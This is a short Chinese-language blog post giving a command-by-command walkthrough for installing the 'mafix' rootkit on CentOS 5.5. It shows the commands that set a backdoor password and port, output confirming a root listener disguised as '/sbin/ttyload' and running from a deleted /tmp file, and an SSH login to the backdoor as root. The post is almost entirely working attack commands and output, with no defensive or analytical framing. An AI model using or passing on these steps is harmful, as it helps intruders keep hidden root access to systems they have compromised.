z0nek

关于我

测试机器:
CentOS5.5 32位和64位系统测试成功

[root@localhost mafix]# uname -aLinux localhost.localdomain 2.6.18-194.el5#1 SMP Fri Apr 2 14:58:35 EDT 2010 i686 i686 i386 GNU/Linux

[root@localhost tmp]# tar zxvf mafix.tar.gzmafix/mafix/mafixlibsmafix/mafixmafix/rootmafix/HOW-TO

[root@localhost tmp]# cd mafix

[root@localhost mafix]# lsHOW-TO mafix mafixlibs root

[root@localhost mafix]#./root hehe123 2345//其中hehe123为密码 2345为后门端口

[root@localhost mafix]# netstat -anlp | grep 2345tcp 000.0.0.0:23450.0.0.0:* LISTEN 15690/ttyload

[root@localhost mafix]# ps axu | grep 15690| grep -v greproot 156900.00.02280508?Ss22:200:00/sbin/ttyload -q

[root@localhost mafix]# ll /proc/15690/exelrwxrwxrwx 1 root root 0Jun822:22/proc/15690/exe ->/tmp/sh-AIN2LD3APKJ (deleted)

登录后门:

[root@vincent tmp]# ssh 172.16.100.154-p 2345root@maf!x:/root$ whoamiroot


标签:后门

评论
© z0nek | Powered by LOFTER